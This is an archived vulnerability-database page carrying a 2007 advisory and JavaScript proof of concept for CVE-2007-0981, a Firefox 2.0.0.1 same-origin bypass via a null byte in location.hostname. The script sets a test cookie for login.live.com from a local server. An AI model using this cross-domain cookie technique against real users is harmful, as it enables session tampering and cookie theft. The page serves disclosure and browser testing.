Lucene search

K
seebugRootSSV:64493
HistoryJul 01, 2014 - 12:00 a.m.

Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
16

EPSS

0.97

Percentile

99.8%

No description provided by source.


                                                &#60;!--
________________________________________________________________________________
  
Mozilla Firefox &#39;location.hostname&#39; Cross-Domain Vulnerability
________________________________________________________________________________

Software      : Mozilla Firefox version 2.0.0.1 and prior 
CVE reference : CVE-2007-0981
Impact        : Security Bypass
Risk          : Moderate
Discovered by : Michal Zalewski (http://lcamtuf.coredump.cx/)
Advisory Date	: 2007-02-15

Mozilla Firefox allows remote attackers to bypass the same origin policy, steal
cookies, and conduct other attacks by writing a URI with a null byte to the
hostname (location.hostname) DOM property, due to interactions with DNS
resolver code.

Links
http://lcamtuf.dione.cc/ffhostname.html (test)
https://bugzilla.mozilla.org/show_bug.cgi?id=370445
________________________________________________________________________________

How To Test Your Browser ?
1 - Execute this on your local web server (or change variable &#39;mydomain&#39;)
2 - Go to the link &#39;http://login.live.com/&#39; and read the login
    (or check Tools -&#62; Options -&#62; Privacy -&#62; Show Cookies for login.live.com)
________________________________________________________________________________

Gorn, gorn.support[gmail]com
2007-02-19 16:00

--&#62;

&#60;script language=&#34;javascript&#34;&#62; 
var mydomain = &#39;127.0.0.1&#39;;
var var_cook = &#39;MSPPre=firefox_vulnerability_test&#39;;
var dom_cook = &#39;login.live.com&#39;;

if (location.hostname == mydomain)
{
  try { location.hostname = mydomain + &#39;\x00www.&#39; + dom_cook; } 
  catch (err) { alert(&#39;Failed to modify location.hostname&#39;); }
} else {
  document.cookie = var_cook + &#39;; domain=.&#39; + dom_cook + &#39;; path=/;&#39;;  
}
&#60;/script&#62;

# milw0rm.com [2007-02-20]